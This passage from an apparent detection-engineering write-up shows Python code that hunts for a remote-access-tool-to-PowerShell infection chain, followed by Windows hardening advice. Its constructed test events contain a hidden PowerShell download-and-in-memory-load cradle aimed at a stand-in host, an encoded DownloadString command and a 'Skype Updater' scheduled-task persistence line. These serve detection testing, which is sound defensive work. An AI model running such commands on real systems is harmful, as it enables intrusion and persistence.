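    Returns the list of rule names it matches; empty means nothing of interest."""
    parent, child = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    cmd = expand_encoded(event.get("CommandLine", ""))
    hits = []
    if parent in REMOTE_ACCESS and child in SCRIPT_HOSTS | POWERSHELL | {"cmd.exe"}:
        hits.append("remote-access-tool-spawned-interpreter")
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        hits.append("script-host-spawned-powershell")
        if DOWNLOAD_MARKERS.search(cmd):
            hits.append("powershell-download")
        if MEMORY_LOAD_MARKERS.search(cmd):
            hits.append("powershell-in-memory-load")
    if child in POWERSHELL and PUBLIC_DIR.search(cmd):
        hits.append("staging-in-users-public")
    if child in POWERSHELL | {"schtasks.exe"} and TASK_NAME.search(cmd):
        hits.append("skype-updater-scheduled-task")
    return hits


def hunt(events):
    """[(ProcessId, [rules]) for every event that matched at least one rule]."""
    results = []
    for event in events:
        hits = evaluate_process_event(event)
        if hits:
            results.append((event.get("ProcessId"), hits))
    return results


def _ev(pid, parent, image, cmdline):
    return {"ProcessId": pid, "ParentImage": parent, "Image": image, "CommandLine": cmdline}


# Constructed events (not real telemetry). example.invalid stands in for the attacker host;
# file and task names follow the article. The encoded sample is built here so it decodes cleanly.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
SC_CLIENT = r"C:\Program Files (x86)\ScreenConnect Client (constructed)\ScreenConnect.ClientService.exe"
CRADLE = ("powershell -nop -w hidden -c \"iwr https://example.invalid/logs.ldk -OutFile C:\\Users\\Public\\logs.ldk; "
          "[System.Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\\Users\\Public\\logs.ldr'))\"")
ENCODED = base64.b64encode(
    "(New-Object Net.WebClient).DownloadString('https://example.invalid/u')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    _ev(1001, SC_CLIENT, WSCRIPT, r"wscript.exe C:\Users\Public\Update.vbs"),
    _ev(1002, WSCRIPT, PS, CRADLE),
    _ev(1003, PS, r"C:\Windows\System32\schtasks.exe",
        'schtasks /create /tn "Skype Updater" /sc minute /mo 5 /tr "powershell -w hidden -File C:\\Users\\Public\\x.ps1"'),
    _ev(1004, r"C:\Windows\explorer.exe", PS, r"powershell -File C:\Scripts\inventory.ps1"),   # benign
    _ev(1005, WSCRIPT, PS, "powershell -enc " + ENCODED),
]

if __name__ == "__main__":
    for pid, rules in hunt(SAMPLE_EVENTS):
        print(pid, rules)
```

The rule names map onto fields every SIEM exposes, so the regexes can be ported to KQL or Sigma once they are tuned. `powershell-download` on its own will fire on legitimate administration scripts; the parent-process condition (a script host, or a remote access tool, spawning the interpreter) is what carries the signal, and an event that hits both the download and the in-memory-load rules from a `wscript.exe` parent should be treated as the infection chain above until proven otherwise.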
Compliance Best Practices
- Enable PowerShell Script Block Logging and Module Logging via Group Policy and forward these logs to your SIEM to create detections for obfuscated scripts and suspicious in-memory execution.
- Deploy an application control policy, such as Windows Defender Application Control (WDAC) or AppLocker, to restrict the execution of unauthorized scripts and binaries from non-standard locations like `C:\Users\Public\`.
- Establish a formal policy and technical standard for all remote access software, requiring tools to be centrally managed, configured with multi-factor authentication, and have their session logs forwarded to the SIEM for monitoring.
- Work with your EDR vendor or internal team to create and enable behavioral detection rules that alert on processes attempting to disable security logging or perform in-memory .NET assembly loading from a scripting engine.
- For user groups that do not have a business need for scripting, use Group Policy to disable Windows Script Host (`WScript.exe`/`CScript.exe`). Set the PowerShell execution policy to 'Restricted' as a guardrail, but do not rely on it: it is not a security boundary and is bypassed with `-ExecutionPolicy Bypass` or by passing commands inline, so the application control policy above and PowerShell Constrained Language Mode are what actually limit what a script can do.